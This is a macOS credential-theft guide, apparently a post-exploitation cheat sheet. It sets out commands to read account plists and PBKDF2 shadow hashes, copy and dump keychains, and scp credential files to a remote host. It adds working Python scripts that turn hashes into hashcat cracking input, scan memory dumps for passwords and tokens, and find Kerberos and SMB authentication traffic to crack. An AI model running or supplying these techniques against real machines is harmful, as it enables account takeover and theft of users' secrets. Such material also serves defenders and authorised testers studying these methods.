User Credentials

macOS User Database (Plist Files)

Local user records live in /var/db/dslocal/nodes/Default/users/, one binary plist per account. The directory is readable only by root, so every command below that touches it needs sudo.

sudo ls /var/db/dslocal/nodes/Default/users/

Print a specific user's record (it is a binary plist, so raw cat output is mostly unreadable; convert it with plutil as shown next):

sudo cat /var/db/dslocal/nodes/Default/users/<username>.plist

Use plutil to convert the binary plist to XML on stdout (-o - writes to stdout instead of rewriting the file in place):

sudo plutil -convert xml1 -o - /var/db/dslocal/nodes/Default/users/<username>.plist

Keychain Files

Keychain files hold passwords, private keys, certificates and tokens. Item secrets are encrypted with keys derived from the keychain password: for the login keychain that is normally the user's login password, and for the system keychain the key material is kept in /var/db/SystemKey (root-readable).

Common keychain file locations (the user's login.keychain-db plus, in a UUID-named subdirectory, the iCloud keychain database; and the host's System.keychain):

ls ~/Library/Keychains/
ls /Library/Keychains/

Copy a keychain file out for offline analysis (the user's own login keychain does not need sudo; the system keychain does):

sudo cp /Library/Keychains/<keychain-file> /path/to/destination/

Dumping Password Hashes

Retrieve a list of all local user accounts (names beginning with an underscore are service accounts):

dscl . list /Users

Dump a user's record. Attributes such as the home directory, shell and UID are readable by anyone, but the ShadowHashData attribute (the password hash, printed as a hex byte dump of an embedded plist) is only returned when the command runs as root:

sudo dscl . read /Users/<username>

Shadow Hash Files

Since OS X 10.8 the local password hash is PBKDF2-HMAC-SHA512. There is no separate shadow file: the user's plist in /var/db/dslocal/nodes/Default/users/ carries a ShadowHashData attribute whose value is an embedded binary plist holding a SALTED-SHA512-PBKDF2 dictionary with the salt, the iteration count and 128 bytes of entropy (the derived key).

Read the shadow hash for a specific user (the output is a hex byte dump of that embedded plist):

sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashData
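The following is an added example (not code from the original page) showing what the hex blob above actually contains: it parses a user plist, unpacks the embedded SALTED-SHA512-PBKDF2 dictionary, formats the result as a hashcat-style $ml$ line, and checks a candidate password by recomputing PBKDF2-HMAC-SHA512. It runs offline on a constructed record that mirrors the real dslocal layout; pass the path of a copied <username>.plist as the first argument to parse a real one. The 64-byte entropy truncation for hashcat mode 7100 is an assumption to verify against hashcat's own example hash.

```python
#!/usr/bin/env python3
"""Parse ShadowHashData from a dslocal user plist and test a password.

Added example, not part of the original page. Runs on a constructed
record by default; give a copied user plist path as argv[1] for a real one.
"""
import hashlib
import hmac
import plistlib
import sys

# Assumption: hashcat mode 7100 ($ml$) takes the first 64 of the 128 entropy
# bytes macOS stores. Check against hashcat's example hash before relying on it.
HASHCAT_ENTROPY_BYTES = 64


def parse_shadow_hash(user_plist: bytes):
    """Return (iterations, salt, entropy) from a user record's ShadowHashData.

    ShadowHashData is an array holding one binary plist; that inner plist maps
    'SALTED-SHA512-PBKDF2' to a dict with 'entropy', 'iterations' and 'salt'.
    """
    record = plistlib.loads(user_plist)
    inner = plistlib.loads(record["ShadowHashData"][0])
    params = inner["SALTED-SHA512-PBKDF2"]
    return (int(params["iterations"]),
            bytes(params["salt"]),
            bytes(params["entropy"]))


def to_hashcat(iterations: int, salt: bytes, entropy: bytes) -> str:
    """Format as $ml$<iterations>$<salt hex>$<entropy hex> (hashcat -m 7100)."""
    return "$ml$%d$%s$%s" % (iterations, salt.hex(),
                             entropy[:HASHCAT_ENTROPY_BYTES].hex())


def verify_password(candidate: str, iterations: int,
                    salt: bytes, entropy: bytes) -> bool:
    """Recompute PBKDF2-HMAC-SHA512 with the stored parameters and compare."""
    derived = hashlib.pbkdf2_hmac("sha512", candidate.encode("utf-8"),
                                  salt, iterations, dklen=len(entropy))
    return hmac.compare_digest(derived, entropy)


def make_sample_user_plist(username: str, password: str,
                           iterations: int = 30000,
                           salt: bytes = bytes(range(32))) -> bytes:
    """Constructed sample record mirroring the real layout (not a real dump)."""
    entropy = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"),
                                  salt, iterations, dklen=128)
    inner = plistlib.dumps({"SALTED-SHA512-PBKDF2": {"entropy": entropy,
                                                     "iterations": iterations,
                                                     "salt": salt}},
                           fmt=plistlib.FMT_BINARY)
    return plistlib.dumps({"name": [username], "uid": ["501"],
                           "ShadowHashData": [inner]},
                          fmt=plistlib.FMT_BINARY)


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = make_sample_user_plist("alice", "hunter2", iterations=1000)
    iterations, salt, entropy = parse_shadow_hash(blob)
    print(to_hashcat(iterations, salt, entropy))
    for guess in ("password", "hunter2"):
        print("%-10s %s" % (guess, verify_password(guess, iterations, salt, entropy)))


if __name__ == "__main__":
    main(sys.argv)
```

Real records use iteration counts in the tens of thousands, so per-guess cost is high; the script is for confirming a single candidate or producing the cracking input, not for guessing in a loop.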

Copying and Transferring Credential Files

Copy Files Locally

sudo cp /var/db/dslocal/nodes/Default/users/<username>.plist /path/to/destination/

Secure Transfer

Use scp to transfer the files to a remote system for offline analysis (copies made with sudo are root-owned, so chown them first or run scp as root):

scp /path/to/destination/<file> user@remote-system:/remote/path/

Keychain Decryption (Advanced)

Use the security command to interact with keychain items. dump-keychain -d prints each item's secret, but macOS raises an Allow/Deny dialog for every item whose ACL does not already trust the calling process, so on an interactive session this is noisy and on a headless one it hangs. Offline parsers such as chainbreaker avoid that by decrypting a copied keychain-db directly with the keychain password:

security dump-keychain -d /path/to/keychain.keychain-db

Unlock the keychain first if you have the user's password (this removes the unlock prompt, not the per-item prompts; the password also lands in the shell history and process list):

security unlock-keychain -p <password> /path/to/keychain.keychain-db

Advanced Techniques

Memory Dumping

vmmap prints a process's virtual memory map (regions, permissions and backing files), not the contents of memory; -w selects wide output. Use it to identify the heap and MALLOC regions worth reading, then read them with lldb (process attach -p <PID>, then memory read, or process save-core to write the whole image). On current macOS attaching requires root and fails for SIP-protected and hardened-runtime binaries that lack the get-task-allow entitlement:

sudo vmmap -w <PID>
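Once a region or core has been written to disk, the usual next step is a strings pass that understands both ASCII and UTF-16LE, because Foundation and CoreFoundation keep many strings in UTF-16. The scanner below is an added example (not from the original page): it extracts printable runs in both encodings and keeps those that contain a credential keyword or sit within a short window after one. It runs on a constructed buffer; pass a dump file as the first argument to scan a real one. The keyword list and window size are choices of this example.

```python
#!/usr/bin/env python3
"""Scan a raw memory dump for credential-looking strings.

Added example, not part of the original page. Handles ASCII and UTF-16LE
runs; runs on a constructed buffer unless a dump path is given as argv[1].
"""
import re
import sys

KEYWORDS = ("password", "passwd", "secret", "token", "authorization")
MIN_LEN = 6          # shortest run to report, in characters
NEAR_WINDOW = 64     # bytes after a keyword string that still count as "near"

ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(buf: bytes):
    """Yield (offset, encoding, text) for every printable run in buf."""
    for m in ASCII_RE.finditer(buf):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RE.finditer(buf):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def _has_keyword(text: str) -> bool:
    lowered = text.lower()
    return any(k in lowered for k in KEYWORDS)


def find_credentials(buf: bytes, window: int = NEAR_WINDOW):
    """Return strings that contain a keyword or follow one within `window` bytes.

    Values usually sit right after their label in memory (a key/value pair,
    a struct field, a form body), so the string after 'password=' is kept
    even though it contains no keyword itself.
    """
    found = sorted(extract_strings(buf))
    keyword_offsets = [off for off, _, text in found if _has_keyword(text)]
    hits = []
    for off, enc, text in found:
        near = any(0 <= off - k <= window for k in keyword_offsets)
        if near or _has_keyword(text):
            hits.append((off, enc, text))
    return hits


# Constructed sample dump: a few ASCII pairs, a UTF-16LE pair, and noise.
SAMPLE_DUMP = (
    b"\x7fELF\x00\x00\x00\x00"
    + b"username=alice\x00"
    + b"password=\x00" + b"Tr0ub4dor&3\x00"
    + b"\x00" * 40
    + "kSecValuePassword".encode("utf-16le") + b"\x00\x00"
    + "hunter2!!".encode("utf-16le") + b"\x00\x00"
    + b"\x00" * 200 + b"unrelated string here\x00"
)


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            buf = fh.read()
    else:
        buf = SAMPLE_DUMP
    for off, enc, text in find_credentials(buf):
        print("0x%08x %-8s %s" % (off, enc, text))


if __name__ == "__main__":
    main(sys.argv)
```

The window heuristic trades precision for recall: widen it for heap regions where labels and values are allocated separately, and expect false positives from constant names such as kSecValuePassword, which is a CoreFoundation key rather than a secret.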

Network Capture

Capture Kerberos (port 88) and SMB (port 445) traffic with tcpdump. Quote the filter so the shell hands it over as one expression, and replace en0 with the interface actually in use (ifconfig lists them). Kerberos pre-authentication and NTLM-over-SMB exchanges in the resulting capture can be extracted for offline cracking:

sudo tcpdump -i en0 'port 88 or port 445' -w auth_traffic.pcap
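To triage a capture without a full dissector, it is enough to walk the classic pcap format that tcpdump -w writes and pull out the IPv4 flows on ports 88 and 445. The reader below is an added example (not code from the original page) with no dependencies beyond the standard library: it parses the pcap and Ethernet/IPv4/TCP/UDP headers, tallies client-to-server flows per service, and ignores everything else. It runs on a constructed four-packet capture; pass a pcap path as the first argument to read a real one. Only link type 1 (Ethernet) and IPv4 are handled, an assumption that matches a tcpdump -i en0 capture.

```python
#!/usr/bin/env python3
"""List Kerberos and SMB flows in a classic pcap file.

Added example, not part of the original page. Standard library only;
reads a constructed capture unless a pcap path is given as argv[1].
"""
import struct
import sys
from collections import Counter

AUTH_PORTS = {88: "kerberos", 445: "smb"}


def iter_pcap_records(data: bytes):
    """Yield (timestamp, frame bytes) from a classic pcap buffer."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled)")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    if linktype != 1:
        raise ValueError("only Ethernet (link type 1) is handled")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len


def parse_frame(frame: bytes):
    """Return (proto, src, sport, dst, dport) for IPv4 TCP/UDP frames, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType IPv4 only
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    proto = ip[9]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    l4 = ip[ihl:]
    if proto not in (6, 17) or len(l4) < 4:
        return None
    sport, dport = struct.unpack_from("!HH", l4, 0)
    return ("tcp" if proto == 6 else "udp", src, sport, dst, dport)


def auth_flows(data: bytes) -> Counter:
    """Count packets per (service, proto, client, server) for ports 88 and 445."""
    flows = Counter()
    for _ts, frame in iter_pcap_records(data):
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        proto, src, sport, dst, dport = parsed
        if dport in AUTH_PORTS:          # client -> server
            flows[(AUTH_PORTS[dport], proto, src, dst)] += 1
        elif sport in AUTH_PORTS:        # server -> client, fold into same flow
            flows[(AUTH_PORTS[sport], proto, dst, src)] += 1
    return flows


def _ipv4_frame(proto: int, src: str, dst: str, sport: int, dport: int) -> bytes:
    """Constructed Ethernet/IPv4 frame with a minimal TCP SYN or UDP header."""
    if proto == 6:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 0x50, 0x02, 8192, 0, 0)
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 1, 0, 64, proto, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split(".")))
    return b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip + l4


def build_sample_pcap(frames) -> bytes:
    """Constructed little-endian pcap with Ethernet link type."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


SAMPLE_PCAP = build_sample_pcap([
    _ipv4_frame(17, "10.0.0.5", "10.0.0.1", 49152, 88),       # Kerberos request (UDP)
    _ipv4_frame(17, "10.0.0.1", "10.0.0.5", 88, 49152),       # Kerberos reply
    _ipv4_frame(6, "10.0.0.5", "10.0.0.20", 50000, 445),      # SMB session
    _ipv4_frame(6, "10.0.0.5", "93.184.216.34", 50001, 443),  # HTTPS, ignored
])


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = SAMPLE_PCAP
    for (service, proto, client, server), n in sorted(auth_flows(data).items()):
        print("%-9s %-4s %-16s -> %-16s %d packets" % (service, proto, client, server, n))


if __name__ == "__main__":
    main(sys.argv)
```

The flow table tells you which hosts are authenticating to which servers; extracting the actual AS-REQ pre-authentication timestamps or NTLM challenge/response pairs for cracking needs a protocol-aware tool on top of this.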